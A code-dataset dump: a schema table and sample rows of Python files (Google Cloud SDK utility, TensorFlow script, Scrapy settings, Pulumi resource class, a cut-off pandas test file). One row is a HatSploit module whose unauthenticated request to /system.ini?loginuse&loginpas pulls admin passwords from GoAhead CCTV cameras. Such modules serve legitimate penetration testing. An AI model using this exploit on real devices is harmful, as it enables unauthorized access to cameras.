Dataset schema (column, dtype, observed length/value range or class count; ⌀ marks nullable columns):

| Column | Dtype | Stats |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 3–616 |
| content_id | string | lengths 40–40 |
| detected_licenses | sequence | lengths 0–112 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–115 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 (⌀) | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] (⌀) | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (⌀) | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | lengths 3 – 10.2M |
| authors | sequence | lengths 1–1 |
| author_id | string | lengths 1–132 |

Sample rows (each `content` cell below holds a complete source file):
7fe354c98d8d01ba22505c5e5c51b733782f34d6 | a3cc7286d4a319cb76f3a44a593c4a18e5ddc104 | /lib/googlecloudsdk/api_lib/ml/vision/util.py | d48320c61c682ef73501c2c44fe8ff497a756db5 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jordanistan/Google-Cloud-SDK | f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | refs/heads/master | 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 | NOASSERTION | 2023-08-22T01:12:24 | 2018-03-28T02:31:19 | Python | UTF-8 | Python | false | false | 2,070 | py |
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for gcloud ml vision commands."""
import os
import re
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.core import exceptions
VISION_API = 'vision'
VISION_API_VERSION = 'v1'
IMAGE_URI_FORMAT = r'^(https{,1}?|gs)://'  # matches http://, https:// and gs:// URIs
class Error(exceptions.Error):
"""Error for gcloud ml vision commands."""
class ImagePathError(Error):
"""Error if an image path is improperly formatted."""
def GetImageFromPath(path):
"""Builds an Image message from a path.
Args:
path: the path arg given to the command.
Raises:
ImagePathError: if the image path does not exist and does not seem to be
a remote URI.
Returns:
vision_v1_messages.Image: an image message containing information for the
API on the image to analyze.
"""
messages = apis.GetMessagesModule(VISION_API, VISION_API_VERSION)
image = messages.Image()
if os.path.isfile(path):
with open(path, 'rb') as content_file:
image.content = content_file.read()
elif re.match(IMAGE_URI_FORMAT, path):
image.source = messages.ImageSource(imageUri=path)
else:
raise ImagePathError(
'The image path does not exist locally or is not properly formatted. '
'A URI for a remote image must be a Google Cloud Storage image URI, '
'which must be in the form `gs://bucket_name/object_name`, or a '
'publicly accessible image HTTP/HTTPS URL. Please double-check your '
'input and try again.')
return image
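# Illustrative calls (added note, not part of the original module):
#   GetImageFromPath('gs://my-bucket/photo.jpg')   # remote URI -> image.source
#   GetImageFromPath('/tmp/photo.jpg')             # local file -> image.content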
| [
"[email protected]"
] | |
14dfa0a6647e1c79cd33c076529270c16b054056 | 09933dafbbc12fe20c405362850ffbf315b01a58 | /src-tag-ent/gen_data.py | fbddab6277c97047553db17485a2206acc0a6875 | [] | no_license | johndpope/advrelation | 1ce1fd4ffc0b7abbea2762c3a8941b469c4f7cf5 | bc77dcfa8669d612aded6a053fff6766798bed14 | refs/heads/master | 2020-03-22T22:55:48.664711 | 2018-03-03T04:43:11 | 2018-03-03T04:43:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py |
import tensorflow as tf
import config as config_lib
from inputs import dataset, semeval_v2
tf.logging.set_verbosity(tf.logging.INFO)
config = config_lib.get_config()
semeval_text = semeval_v2.SemEvalCleanedTextData(
config.semeval_dir, config.semeval_train_file, config.semeval_test_file)
# length statistics
semeval_text.length_statistics()
# gen vocab
vocab = dataset.Vocab(config.out_dir, config.vocab_file)
# vocab.generate_vocab(semeval_text.tokens())
# # trim embedding
# embed = dataset.Embed(config.out_dir, config.trimmed_embed300_file, config.vocab_file)
# google_embed = dataset.Embed(config.pretrain_embed_dir,
# config.google_embed300_file, config.google_words_file)
# embed.trim_pretrain_embedding(google_embed)
# build SemEval record data
semeval_text.set_vocab(vocab)
tag_encoder = dataset.Label(config.semeval_dir, config.semeval_tags_file)
semeval_text.set_tags_encoder(tag_encoder)
semeval_record = semeval_v2.SemEvalCleanedRecordData(semeval_text,
config.out_dir, config.semeval_train_record, config.semeval_test_record)
semeval_record.generate_data()
# INFO:tensorflow:(percent, quantile) [(50, 18.0), (70, 22.0), (80, 25.0),
# (90, 29.0), (95, 34.0), (98, 40.0), (100, 97.0)]
# INFO:tensorflow:generate vocab to data/generated/vocab.txt
# INFO:tensorflow:trim embedding to data/generated/embed300.trim.npy
# INFO:tensorflow:generate TFRecord data
| [
"[email protected]"
] | |
c4fd4774aaf0e10c3720251b62ae4f7fd5eca3ae | 437428a48278b4e9bc04e1b8acbb33199f409376 | /modules/exploit/unix/cctv/goahead_password_disclosure.py | ae2a949fa5f2033187282244644b19db5808d163 | [
"MIT"
] | permissive | happylaodu/HatSploit | 06d18ba2590456241ba61273d9f3d662a8bb26ec | 9d53f3db85ce38483c6e7d16570ac233c5dd93cf | refs/heads/main | 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py |
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.lib.module import Module
from utils.http.http import HTTPClient
from utils.string.string import StringTools
class HatSploitModule(Module, HTTPClient, StringTools):
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/unix/cctv/goahead_password_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Pierre Kim (pierrekim)'
],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
self.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
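        # The camera's GoAhead web server returns its raw configuration dump for
        # this unauthenticated request; the loginuse/loginpas fields in the
        # response hold the credentials parsed below (explanatory note).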
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path=payload
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
gathered_data = response.text
strings = self.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password = strings[username_index + 1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.output_warning(f"Target vulnerable, but default username is not {username}.")
def run(self):
remote_host, remote_port, username = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port, username)
| [
"[email protected]"
] | |
ec20e0f130c9b07be9f40df8385ecc71d1678676 | 1b3fc35ada474601a76de3c2908524336d6ca420 | /day07/作业/tencent/tencent/settings.py | d96bd9dfc78cc95ce6fafa6d33a2745ee7a9c4af | [] | no_license | dqsdatalabs/Internet-worm | db3677e65d11542887adcde7719b7652757a3e32 | 62f38f58b4fa7643c482077f5ae18fff6fd81915 | refs/heads/master | 2022-01-16T14:29:52.184528 | 2018-12-25T08:46:08 | 2018-12-25T08:46:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,079 | py |
# -*- coding: utf-8 -*-
# Scrapy settings for tencent project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'tencent'
SPIDER_MODULES = ['tencent.spiders']
NEWSPIDER_MODULE = 'tencent.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'tencent (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'tencent.middlewares.TencentSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'tencent.middlewares.TencentDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'tencent.pipelines.TencentPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"[email protected]"
] | |
b120a89e2d2dd9e418954d016dc61f794cb03dc7 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /sdk/python/pulumi_azure_native/domainregistration/v20201001/domain_ownership_identifier.py | 0686f0d099df8d96bf3e28acd50d6042d8b40850 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bpkgoud/pulumi-azure-native | 0817502630062efbc35134410c4a784b61a4736d | a3215fe1b87fba69294f248017b1591767c2b96c | refs/heads/master | 2023-08-29T22:39:49.984212 | 2021-11-15T12:43:41 | 2021-11-15T12:43:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,342 | py |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['DomainOwnershipIdentifierArgs', 'DomainOwnershipIdentifier']
@pulumi.input_type
class DomainOwnershipIdentifierArgs:
def __init__(__self__, *,
domain_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DomainOwnershipIdentifier resource.
:param pulumi.Input[str] domain_name: Name of domain.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of identifier.
:param pulumi.Input[str] ownership_id: Ownership Id.
"""
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if ownership_id is not None:
pulumi.set(__self__, "ownership_id", ownership_id)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
Name of domain.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
Name of the resource group to which the resource belongs.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def kind(self) -> Optional[pulumi.Input[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of identifier.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="ownershipId")
def ownership_id(self) -> Optional[pulumi.Input[str]]:
"""
Ownership Id.
"""
return pulumi.get(self, "ownership_id")
@ownership_id.setter
def ownership_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ownership_id", value)
class DomainOwnershipIdentifier(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Domain ownership Identifier.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] domain_name: Name of domain.
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] name: Name of identifier.
:param pulumi.Input[str] ownership_id: Ownership Id.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainOwnershipIdentifierArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Domain ownership Identifier.
:param str resource_name: The name of the resource.
:param DomainOwnershipIdentifierArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainOwnershipIdentifierArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
domain_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
ownership_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
if domain_name is None and not opts.urn:
raise TypeError("Missing required property 'domain_name'")
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["kind"] = kind
__props__.__dict__["name"] = name
__props__.__dict__["ownership_id"] = ownership_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:domainregistration:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20150401:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20180201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20190801:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200601:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20200901:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20201201:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210101:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210115:DomainOwnershipIdentifier"), pulumi.Alias(type_="azure-native:domainregistration/v20210201:DomainOwnershipIdentifier")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DomainOwnershipIdentifier, __self__).__init__(
'azure-native:domainregistration/v20201001:DomainOwnershipIdentifier',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DomainOwnershipIdentifier':
"""
Get an existing DomainOwnershipIdentifier resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DomainOwnershipIdentifierArgs.__new__(DomainOwnershipIdentifierArgs)
__props__.__dict__["kind"] = None
__props__.__dict__["name"] = None
__props__.__dict__["ownership_id"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return DomainOwnershipIdentifier(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="ownershipId")
def ownership_id(self) -> pulumi.Output[Optional[str]]:
"""
Ownership Id.
"""
return pulumi.get(self, "ownership_id")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
The system metadata relating to this resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
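# Illustrative usage (hypothetical values, added note; not part of the
# generated file):
#
#   import pulumi_azure_native as azure_native
#
#   ident = azure_native.domainregistration.v20201001.DomainOwnershipIdentifier(
#       "ident",
#       domain_name="example.com",
#       resource_group_name="my-rg",
#       ownership_id="myOwnershipId")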
| [
"[email protected]"
] | |
d5d74faabbe533b0b669c36f2c141f32fc8b63aa | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/pandas/tests/arrays/categorical/test_analytics.py | 6aa36525fd6980d29cb1249c01c9b0434bf179be | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 14,794 | py |
import re
import sys
import numpy as np
import pytest
from pandas.compat import PYPY
from pandas import Categorical, Index, NaT, Series, date_range
import pandas._testing as tm
from pandas.api.types import is_scalar
class TestCategoricalAnalytics:
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_not_ordered_raises(self, aggregation):
# unordered cats have no min/max
cat = Categorical(["a", "b", "c", "d"], ordered=False)
msg = f"Categorical is not ordered for operation {aggregation}"
agg_func = getattr(cat, aggregation)
with pytest.raises(TypeError, match=msg):
agg_func()
def test_min_max_ordered(self):
cat = Categorical(["a", "b", "c", "d"], ordered=True)
_min = cat.min()
_max = cat.max()
assert _min == "a"
assert _max == "d"
cat = Categorical(
["a", "b", "c", "d"], categories=["d", "c", "b", "a"], ordered=True
)
_min = cat.min()
_max = cat.max()
assert _min == "d"
assert _max == "a"
@pytest.mark.parametrize(
"categories,expected",
[
(list("ABC"), np.NaN),
([1, 2, 3], np.NaN),
pytest.param(
Series(date_range("2020-01-01", periods=3), dtype="category"),
NaT,
marks=pytest.mark.xfail(
reason="https://github.com/pandas-dev/pandas/issues/29962"
),
),
],
)
@pytest.mark.parametrize("aggregation", ["min", "max"])
def test_min_max_ordered_empty(self, categories, expected, aggregation):
# GH 30227
cat = Categorical([], categories=categories, ordered=True)
agg_func = getattr(cat, aggregation)
result = agg_func()
assert result is expected
@pytest.mark.parametrize(
"values, categories",
[(["a", "b", "c", np.nan], list("cba")), ([1, 2, 3, np.nan], [3, 2, 1])],
)
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("function", ["min", "max"])
def test_min_max_with_nan(self, values, categories, function, skipna):
# GH 25303
cat = Categorical(values, categories=categories, ordered=True)
result = getattr(cat, function)(skipna=skipna)
if skipna is False:
assert result is np.nan
else:
expected = categories[0] if function == "min" else categories[2]
assert result == expected
@pytest.mark.parametrize("function", ["min", "max"])
@pytest.mark.parametrize("skipna", [True, False])
def test_min_max_only_nan(self, function, skipna):
# https://github.com/pandas-dev/pandas/issues/33450
cat = Categorical([np.nan], categories=[1, 2], ordered=True)
result = getattr(cat, function)(skipna=skipna)
assert result is np.nan
@pytest.mark.parametrize("method", ["min", "max"])
def test_deprecate_numeric_only_min_max(self, method):
# GH 25303
cat = Categorical(
[np.nan, 1, 2, np.nan], categories=[5, 4, 3, 2, 1], ordered=True
)
with tm.assert_produces_warning(expected_warning=FutureWarning):
getattr(cat, method)(numeric_only=True)
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_raises(self, method):
cat = Categorical(["a", "b", "c", "b"], ordered=False)
msg = (
f"Categorical is not ordered for operation {method}\n"
"you can use .as_ordered() to change the Categorical to an ordered one"
)
method = getattr(np, method)
with pytest.raises(TypeError, match=re.escape(msg)):
method(cat)
@pytest.mark.parametrize("kwarg", ["axis", "out", "keepdims"])
@pytest.mark.parametrize("method", ["min", "max"])
def test_numpy_min_max_unsupported_kwargs_raises(self, method, kwarg):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
msg = (
f"the '{kwarg}' parameter is not supported in the pandas implementation "
f"of {method}"
)
if kwarg == "axis":
msg = r"`axis` must be fewer than the number of dimensions \(1\)"
kwargs = {kwarg: 42}
method = getattr(np, method)
with pytest.raises(ValueError, match=msg):
method(cat, **kwargs)
@pytest.mark.parametrize("method, expected", [("min", "a"), ("max", "c")])
def test_numpy_min_max_axis_equals_none(self, method, expected):
cat = Categorical(["a", "b", "c", "b"], ordered=True)
method = getattr(np, method)
result = method(cat, axis=None)
assert result == expected
@pytest.mark.parametrize(
"values,categories,exp_mode",
[
([1, 1, 2, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5]),
([1, 1, 1, 4, 5, 5, 5], [5, 4, 3, 2, 1], [5, 1]),
([1, 2, 3, 4, 5], [5, 4, 3, 2, 1], [5, 4, 3, 2, 1]),
([np.nan, np.nan, np.nan, 4, 5], [5, 4, 3, 2, 1], [5, 4]),
([np.nan, np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
([np.nan, np.nan, 4, 5, 4], [5, 4, 3, 2, 1], [4]),
],
)
def test_mode(self, values, categories, exp_mode):
s = Categorical(values, categories=categories, ordered=True)
res = s.mode()
exp = Categorical(exp_mode, categories=categories, ordered=True)
tm.assert_categorical_equal(res, exp)
def test_searchsorted(self, ordered):
# https://github.com/pandas-dev/pandas/issues/8420
# https://github.com/pandas-dev/pandas/issues/14522
cat = Categorical(
["cheese", "milk", "apple", "bread", "bread"],
categories=["cheese", "milk", "apple", "bread"],
ordered=ordered,
)
ser = Series(cat)
# Searching for single item argument, side='left' (default)
res_cat = cat.searchsorted("apple")
assert res_cat == 2
assert is_scalar(res_cat)
res_ser = ser.searchsorted("apple")
assert res_ser == 2
assert is_scalar(res_ser)
# Searching for single item array, side='left' (default)
res_cat = cat.searchsorted(["bread"])
res_ser = ser.searchsorted(["bread"])
exp = np.array([3], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for several items array, side='right'
res_cat = cat.searchsorted(["apple", "bread"], side="right")
res_ser = ser.searchsorted(["apple", "bread"], side="right")
exp = np.array([3, 5], dtype=np.intp)
tm.assert_numpy_array_equal(res_cat, exp)
tm.assert_numpy_array_equal(res_ser, exp)
# Searching for a single value that is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted("cucumber")
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted("cucumber")
# Searching for multiple values one of each is not from the Categorical
with pytest.raises(KeyError, match="cucumber"):
cat.searchsorted(["bread", "cucumber"])
with pytest.raises(KeyError, match="cucumber"):
ser.searchsorted(["bread", "cucumber"])
def test_unique(self):
# categories are reordered based on value when ordered=False
cat = Categorical(["a", "b"])
exp = Index(["a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, cat)
cat = Categorical(["a", "b", "a", "a"], categories=["a", "b", "c"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
tm.assert_categorical_equal(res, Categorical(exp))
cat = Categorical(["c", "a", "b", "a", "a"], categories=["a", "b", "c"])
exp = Index(["c", "a", "b"])
res = cat.unique()
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(exp, categories=["c", "a", "b"])
tm.assert_categorical_equal(res, exp_cat)
# nan must be removed
cat = Categorical(["b", np.nan, "b", np.nan, "a"], categories=["a", "b", "c"])
res = cat.unique()
exp = Index(["b", "a"])
tm.assert_index_equal(res.categories, exp)
exp_cat = Categorical(["b", np.nan, "a"], categories=["b", "a"])
tm.assert_categorical_equal(res, exp_cat)
def test_unique_ordered(self):
# keep categories order when ordered=True
cat = Categorical(["b", "a", "b"], categories=["a", "b"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["c", "b", "a", "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["c", "b", "a"], categories=["a", "b", "c"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(["b", "a", "a"], categories=["a", "b", "c"], ordered=True)
res = cat.unique()
exp_cat = Categorical(["b", "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
cat = Categorical(
["b", "b", np.nan, "a"], categories=["a", "b", "c"], ordered=True
)
res = cat.unique()
exp_cat = Categorical(["b", np.nan, "a"], categories=["a", "b"], ordered=True)
tm.assert_categorical_equal(res, exp_cat)
def test_unique_index_series(self):
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1])
# Categorical.unique sorts categories by appearance order
# if ordered=False
exp = Categorical([3, 1, 2], categories=[3, 1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
